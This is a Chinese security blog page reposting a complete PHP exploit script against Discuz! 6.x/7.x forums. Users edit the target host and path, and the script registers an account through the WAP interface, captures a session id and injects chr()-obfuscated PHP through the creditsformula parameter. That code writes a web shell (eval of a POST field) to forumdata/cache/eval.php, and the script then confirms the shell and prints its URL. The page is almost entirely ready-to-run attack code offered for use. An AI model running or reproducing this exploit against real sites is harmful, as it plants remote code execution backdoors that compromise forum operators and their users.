首页 > 网络安全 > Discuz! 6.x/7.x SODB-2008-13 Exp

Discuz! 6.x/7.x SODB-2008-13 Exp

复制内容到剪贴板程序代码程序代码
1 #!/usr/bin/php
2
3 /** * Discuz! 6.x/7.x SODB-2008-13 Exp * By www.80vul.com * 文件中注释的变量值请自行修改 */
4
5 $host = 'www.80vul.com';
6 // 服务器域名或IP
7 $path = '/discuz/';
8 // 程序所在的路径
9 $key = 0;
10 // 上面的变量编辑好后,请将此处的值改为1
11
12 if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1)
13 exit("专业点好不,先看看里面的注释 -,-\n");
14
15 error_reporting(7);
16 ini_set('max_execution_time', 0);
17
18 $key = time();
19 $cmd = 'action=register&username='.$key.'&password='.$key.'&email='.$key.'@80vul.com&_DCACHE=1';
20 $resp = send();
21
22 preg_match('/logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})/', $resp, $sid);
23
24 if (!$sid)
25 exit("哦,大概是没有开启WAP注册吧 -,-\n");
26
27 $cmd = 'stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid='.$sid[1].'&creditsformula=${${fputs(fopen(chr(46).chr(46).chr(47).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(101).chr(118).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(56).chr(48).chr(118).chr(117).chr(108))}}';
28 send();
29
30 $shell = 'http://'.$host.$path.'forumdata/cache/eval.php';
31
32 if (file_get_contents($shell) == '80vul')
33 exit("好了,去看看你的WebShell吧:\t$shell\n里面的代码是:\t\$_POST[c])?>\n别告诉我你不会用 -,-\n");
34 else
35 exit("嗯,大概是该网站不存在漏洞,换一个吧 -,-\n");
36
37 function send()
38 {
39 global $host, $path, $url, $cmd;
40
41 $data = "POST ".$path."wap/index.php HTTP/1.1\r\n";
42 $data .= "Accept: */*\r\n";
43 $data .= "Accept-Language: zh-cn\r\n";
44 $data .= "Referer: http://$host$path\r\n";
45 $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
46 $data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n";
47 $data .= "Host: $host\r\n";
48 $data .= "Connection: Close\r\n";
49 $data .= "Content-Length: ".strlen($cmd)."\r\n\r\n";
50 $data .= $cmd;
51
52 $fp = fsockopen($host, 80);
53 fputs($fp, $data);
54
55 $resp = '';
56
57 while ($fp && !feof($fp))
58 $resp .= fread($fp, 1024);
59
60 return $resp;
61 }
62
63 ?>
64

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/499

  1. 还没有评论
评论提交中, 请稍候...

留言



注意: 您给他人的评论回复将通过邮件通知到对方。

可以使用的标签: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>
Trackbacks & Pingbacks ( 0 )
  1. 还没有 trackbacks